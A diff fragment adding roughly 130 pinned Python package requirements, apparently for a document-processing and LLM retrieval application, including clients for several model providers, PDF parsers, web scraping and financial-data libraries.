+ huggingface-hub==0.20.3
46
+ humanfriendly==10.0
47
+ idna==3.7
48
+ itsdangerous==2.1.2
49
+ Jinja2==3.1.4
50
+ joblib==1.3.2
51
+ lxml==5.1.0
52
+ MarkupSafe==2.1.5
53
+ minio==7.2.4
54
+ mpmath==1.3.0
55
+ multidict==6.0.5
56
+ multiprocess==0.70.16
57
+ networkx==3.2.1
58
+ nltk==3.9
59
+ numpy==1.26.4
60
+ # nvidia-cublas-cu12==12.1.3.1
61
+ # nvidia-cuda-cupti-cu12==12.1.105
62
+ # nvidia-cuda-nvrtc-cu12==12.1.105
63
+ # nvidia-cuda-runtime-cu12==12.1.105
64
+ # nvidia-cudnn-cu12==8.9.2.26
65
+ # nvidia-cufft-cu12==11.0.2.54
66
+ # nvidia-curand-cu12==10.3.2.106
67
+ # nvidia-cusolver-cu12==11.4.5.107
68
+ # nvidia-cusparse-cu12==12.1.0.106
69
+ # nvidia-nccl-cu12==2.19.3
70
+ # nvidia-nvjitlink-cu12==12.3.101
71
+ # nvidia-nvtx-cu12==12.1.105
72
+ ollama==0.1.9
73
+ # onnxruntime-gpu==1.17.1
74
+ openai==1.12.0
75
+ opencv-python==4.9.0.80
76
+ openpyxl==3.1.2
77
+ ormsgpack==1.5.0
78
+ packaging==23.2
79
+ pandas==2.2.1
80
+ pdfminer.six==20221105
81
+ pdfplumber==0.10.4
82
+ peewee==3.17.1
83
+ pillow==10.3.0
84
+ protobuf==4.25.3
85
+ psutil==5.9.8
86
+ psycopg2-binary==2.9.9
87
+ pyarrow==15.0.0
88
+ pyarrow-hotfix==0.6
89
+ pyclipper==1.3.0.post5
90
+ pycparser==2.21
91
+ pycryptodome
92
+ pycryptodome-test-vectors
93
+ pycryptodomex
94
+ pydantic==2.6.2
95
+ pydantic_core==2.16.3
96
+ PyJWT==2.8.0
97
+ PyMySQL==1.1.1
98
+ PyPDF2==3.0.1
99
+ pypdfium2==4.27.0
100
+ python-dateutil==2.8.2
101
+ python-docx==1.1.0
102
+ python-dotenv==1.0.1
103
+ python-pptx==0.6.23
104
+ PyYAML==6.0.1
105
+ qianfan==0.4.6
106
+ redis==5.0.3
107
+ regex==2023.12.25
108
+ replicate==0.31.0
109
+ requests==2.32.2
110
+ ruamel.yaml==0.18.6
111
+ ruamel.yaml.clib==0.2.8
112
+ safetensors==0.4.2
113
+ scikit-learn==1.5.0
114
+ scipy==1.12.0
115
+ sentence-transformers==2.4.0
116
+ shapely==2.0.3
117
+ six==1.16.0
118
+ sniffio==1.3.1
119
+ StrEnum==0.4.15
120
+ sympy==1.12
121
+ tencentcloud-sdk-python==3.0.1215
122
+ threadpoolctl==3.3.0
123
+ tika==2.6.0
124
+ tiktoken==0.6.0
125
+ tokenizers==0.15.2
126
+ torch==2.2.1
127
+ tqdm==4.66.3
128
+ transformers==4.38.1
129
+ # triton==2.2.0
130
+ typing_extensions==4.10.0
131
+ tzdata==2024.1
132
+ urllib3==2.2.2
133
+ Werkzeug==3.0.3
134
+ xgboost==2.0.3
135
+ XlsxWriter==3.2.0
136
+ xpinyin==0.7.6
137
+ xxhash==3.4.1
138
+ yarl==1.9.4
139
+ zhipuai==2.0.1
140
+ BCEmbedding
141
+ loguru==0.7.2
142
+ umap-learn
143
+ fasttext==0.9.2
144
+ volcengine==1.0.141
145
+ voyageai==0.2.3
146
+ opencv-python-headless==4.9.0.80
147
+ readability-lxml==0.8.1
148
+ html_text==0.6.2
149
+ selenium==4.21.0
150
+ webdriver-manager==4.0.1
151
+ cn2an==0.5.22
152
+ roman-numbers==1.0.2
153
+ word2number==1.1
154
+ markdown==3.6
155
+ mistralai==0.4.2
156
+ boto3==1.34.140
157
+ duckduckgo_search==6.1.9
158
+ google-generativeai==0.7.2
159
+ groq==0.9.0
160
+ wikipedia==1.4.0
161
+ Bio==1.7.1
162
+ arxiv==2.1.3
163
+ pypdf==4.3.0
164
+ google_search_results==2.4.2
165
+ editdistance==0.8.1
166
+ markdown_to_json==2.1.1
167
+ scholarly==1.7.11
168
+ deepl==1.18.0
169
+ psycopg2-binary==2.9.9
170
+ tabulate==0.9.0
171
+ vertexai==1.64.0
172
+ yfinance==0.1.96
173
+ pywencai==0.12.2
174
+ akshare==1.14.72
175
+ ranx==0.3.20